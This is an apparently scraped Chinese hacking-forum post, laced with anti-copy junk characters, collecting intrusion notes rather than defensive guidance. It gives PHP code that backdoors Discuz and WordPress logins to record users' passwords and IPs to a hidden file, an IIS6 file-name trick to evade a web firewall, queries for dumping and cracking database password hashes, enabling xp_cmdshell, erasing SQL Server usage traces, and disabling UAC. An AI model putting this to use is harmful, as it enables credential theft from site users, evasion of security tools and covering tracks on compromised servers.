}* V; X: K$ H9 \0 I6 z( L" O
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。  g: H  l5 e  M3 p4 d
就是搜索case ‘login’
  D, x' I3 G( y在它下面直接插入即可,记录的密码生成在pwd.txt中,
  P% h* v9 S* q% K5 l- `7 O其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
, U9 W0 q0 L: m* K1 t% H利用II6文件解析漏洞绕过安全狗代码:
/ U5 N7 m5 c" |7 r6 r;antian365.asp;antian365.jpg
2 w6 n* W3 Y" n1 Y3 X3 L+ T9 G
6 L" ?- ]/ {( F8 {/ N4 e! ]; ]各种类型数据库抓HASH破解最高权限密码!
. E+ f2 {7 X' s: e) \# |1.sql server2000
6 w" }" X# G4 k7 OSELECT password from master.dbo.sysxlogins where name='sa'
! e+ ]5 I$ j; n; J  c# N) h0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341# K/ S/ |) V/ ^! I# E/ a8 {. r6 \
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A) I6 L" E' {5 p$ p. y+ t( C

* V8 L9 E: v! q0×0100- constant header* J; a) h3 c. m; n% n
34767D5C- salt
1 M4 u; {# S' n$ z6 ]2 Z; G0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
- Z# O: i% i( ^; O6 r! D  ~2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash! x+ P7 P- V% q( l
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
4 A/ \* M" g* ]1 P& _& f' R  dSQL server 2005:-+ X2 W/ |! E7 q! o6 `! {9 _' x
SELECT password_hash FROM sys.sql_logins where name='sa'
" [9 [$ R) ]8 C( L( ?' S0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F! {: p/ R' Q! ]. u
0×0100- constant header' T1 G1 t4 T# ?! o) p# m& t1 B
993BF231-salt; s0 A& @% f4 {: G, |, p9 s
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash' b/ N: D$ ~$ j2 V" {
crack case sensitive hash in cain, try brute force and dictionary based attacks.8 J3 d! c% N( j! n$ L- r; ?- |! ]
- y" D; t/ E$ Y; n
update:- following bernardo’s comments:-
* a- \' {8 ~5 l  O  d5 Q! tuse function fn_varbintohexstr() to cast password in a hex string.1 [( h7 Y2 x0 V( V" a% ^
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins+ y5 ~3 l( e- O( W

* ?. I8 i/ a8 S) Y3 Y2 d& S( dMYSQL:-
8 {3 u) |% F+ ~2 u& B  a  P0 n* Y) ?, W8 b6 E; ?1 F& j* R
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
: @6 }  H  t1 E. u& @7 o. u0 x* S) t
*mysql  < 4.1, }# |8 B8 q0 H/ d
7 U; F# I  j, X1 B3 C
mysql> SELECT PASSWORD(‘mypass’);; F! A6 M2 v- z: |( \4 ^4 E
+——————–+6 F* N, @7 ?6 `0 j2 A# p! a
| PASSWORD(‘mypass’) |
; v5 \1 }; R) }( R3 P+——————–+- q3 b7 d2 D! P
| 6f8c114b58f2ce9e   |
( M% ~0 C6 t2 N+——————–+5 s/ Z# {( r$ c9 E6 i
. E( q  x: p) {0 u2 @5 Y1 r2 e
*mysql >=4.13 c; f# \3 v& b0 w5 Q2 i: n  e9 s

* S* J" \4 w  W0 q, S+ umysql> SELECT PASSWORD(‘mypass’);# h2 _$ B9 [5 n' N+ p9 v; l
+——————————————-+2 K' B3 n& S1 m# e4 P' i
| PASSWORD(‘mypass’)                        |
! o. \+ s: d- l& Y+——————————————-+) V/ a/ ~; x7 o( H! t$ M
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
% a! A8 A! ]) d3 j5 W4 T+——————————————-+- o# f$ w. ?; P
; u3 R/ R( \  |( r
Select user, password from mysql.user
3 f1 s( W) s7 f3 q( {7 ?- ?7 tThe hashes can be cracked in ‘cain and abel’
* c; {, z( i# c! Y5 |. V( W$ F* ]( W& T+ C5 S# I. N% W2 q: @$ N
Postgres:-; J* Q3 z* [3 e4 Y% Q
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)* k2 @- ^$ u5 r( e  J8 D* @
select usename, passwd from pg_shadow;
" D; P3 L$ n/ e. k( m  |4 h) ~9 v4 Dusename      |  passwd
# J8 D0 x0 c0 m  O——————+————————————-- E# e7 Q6 U3 @+ e: }0 K- R# U
testuser            | md5fabb6d7172aadfda4753bf0507ed4396# F0 p6 E0 M. p1 p$ p, M
use mdcrack to crack these hashes:-
* q3 p9 b  d# E3 E  S# ~# S$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
9 h8 R- n+ C( t; D' z
8 \9 b, E# W+ C# I0 ^Oracle:-9 e" J* s" M- h& B- R" u( E9 s
select name, password, spare4 from sys.user$4 f' T6 O: J/ `* ?8 J
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
# D8 U* d# C1 s& T. {More on Oracle later, i am a bit bored….
0 W5 I  l( |6 R: W" v2 m/ A$ j( ~6 ^, K  t: J8 G2 F# a; B- F
. C1 V6 E) f3 |2 p' n
在sql server2005/2008中开启xp_cmdshell+ p6 F; }) d6 S! ]' \. Q0 J8 |' r
-- To allow advanced options to be changed.
! S4 L! G3 |! |- @0 \EXEC sp_configure 'show advanced options', 1. Y5 M, t! j8 ~
GO
$ T0 d7 c# T8 i5 e& L-- To update the currently configured value for advanced options.
; a3 n2 `6 d  q" o0 q# |RECONFIGURE* j0 n4 b; v- Q% T; k+ r2 x; t. E4 F2 Q1 @
GO
  i* j% e+ j, d; r' S-- To enable the feature.( o$ A6 X! q; w3 }( j$ {( L2 y4 V
EXEC sp_configure 'xp_cmdshell', 1
$ c* C2 w: p5 n1 A9 xGO4 ]' M4 m/ E9 I) W
-- To update the currently configured value for this feature.2 O5 i( Y7 Y5 D" W$ O+ P
RECONFIGURE# p1 I! [: @  r$ y
GO' p" F$ r" v- @4 c3 \
SQL 2008 server日志清除,在清楚前一定要备份。
2 _7 @% C' s3 M7 v0 L% W如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:+ F8 K! z1 ^) C3 w- F& A1 Y: x7 q
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
  X, i& b5 T# g" j
3 j% {, G% ^) L2 F$ I9 L# g对于SQL Server 2008以前的版本:
0 Y% S: d' [; |9 Q# m6 OSQL Server 2005:
$ b, l+ [' t$ i6 X. x, i删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
( m& u: _+ E2 F8 m7 I2 iSQL Server 2000:
: |' D5 n4 U9 x" K0 h/ k清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
% V7 n# X; v' u* _
' D$ D# K6 X# E) |, C! B. E本帖最后由 simeon 于 2013-1-3 09:51 编辑% M4 S# e6 r3 O8 [; r0 ]# Y3 N+ v: o( H
, P3 i# v8 C' E( A8 h; f
! s5 F$ @% [! W. K/ k: c. c
windows 2008 文件权限修改. |* l( k6 S2 d6 D
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx5 W- j: `& [; R9 n; l  J( p
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
3 i  w- G4 x1 S% m4 d/ ?一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
% k1 I$ \0 G2 w4 I# d1 S- i: Y# L' s- L! E$ z7 q
Windows Registry Editor Version 5.00
. |, P5 n) W$ t( h1 {[HKEY_CLASSES_ROOT\*\shell\runas]
8 q( h- y9 a1 k8 S: K0 [@="管理员取得所有权"
; m# \, `9 I! H3 O3 t% u4 T"NoWorkingDirectory"="": K5 Y! b4 i# T
[HKEY_CLASSES_ROOT\*\shell\runas\command]+ m( M* e; ~6 _3 O2 e& ]3 o% ~( i
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"' |8 {$ o% ~) v
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"+ Z4 v) K3 O" i( b6 \' R" b+ Z2 w' |( _8 t
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
) X7 c6 l- S4 ^9 G@="管理员取得所有权"1 ~& N7 |" }( t
"NoWorkingDirectory"=""8 h7 [. B2 k. c' A
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
, t% c7 _' V2 i@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
3 v) h/ d+ n% s- N: f; C- N! W"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"# b& }( T0 N# L4 s9 {4 z/ S5 w( \

5 [5 j. R! a* t  Q9 v[HKEY_CLASSES_ROOT\Directory\shell\runas]
& y2 M! p1 \$ N& T# C- O7 H2 ^@="管理员取得所有权"
4 s; ]0 X3 O" r: w"NoWorkingDirectory"=""- u+ |: g& v* o
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]1 `! n( r: c+ T
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"$ ^7 \/ j; ?, `3 g6 y/ A
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"/ c( }/ h% H  r5 T  w
+ t$ q% r/ i, ^: l
# {" L* j' P4 k8 o- v
win7右键“管理员取得所有权”.reg导入
( Q& H0 Q/ R$ ~9 w; F! f4 P) l; ]二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,( T4 u* R! n$ J$ p; z
1、C:\Windows这个路径的“notepad.exe”不需要替换5 T& p+ e* E+ \5 s1 Q
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换7 h9 `7 Z8 A# w
3、四个“notepad.exe.mui”不要管
( e0 U. s: m  U5 X4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
8 `# p5 K: \$ P* t% J& lC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
. `. p: I! \( l. r5 c% _3 D4 r1 |- l替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,! @& B0 T3 I" F* \1 u! }" J
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。9 _* Q- [7 e5 o/ ]/ U* Z1 ~/ G
windows 2008中关闭安全策略: ) A; c) H3 E) b5 q+ ^
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5 y! ]+ _9 O$ b8 T/ t: c
修改uc_client目录下的client.php 在8 B7 i2 D, O7 P6 F/ ?/ `0 A
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
" q! e2 t9 a" r下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
$ ?  m* x3 u0 u! ~% ]  D你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw& h8 _% L! i3 u% ^+ w2 @
if(getenv('HTTP_CLIENT_IP')) {: t% v2 |% N* B7 J" L$ b9 A
$onlineip = getenv('HTTP_CLIENT_IP');, ?; L8 n6 C: {8 x! {
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
" b2 B. @, s" y- w/ n  o7 |$onlineip = getenv('HTTP_X_FORWARDED_FOR');
% b, C6 d% c) d+ |* n" q) q  R% S8 ]  e} elseif(getenv('REMOTE_ADDR')) {+ S% a. O6 W6 ?: A
$onlineip = getenv('REMOTE_ADDR');
* \+ |8 a! W7 n" F' A* @} else {
) b/ t% z. _6 e' l2 B3 A& t$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];  {1 {2 t% Z( ~) l4 m6 I$ Q
}2 J4 }; a+ O6 X" Q8 l4 y' k( D
     $showtime=date("Y-m-d H:i:s");
. D' G$ \$ S1 v& Z0 ^    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";) n5 V$ h, T5 s& o
    $handle=fopen('./data/cache/csslog.php','a+');
" f' N' v! y! O, P, N3 b$ T    $write=fwrite($handle,$record);
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表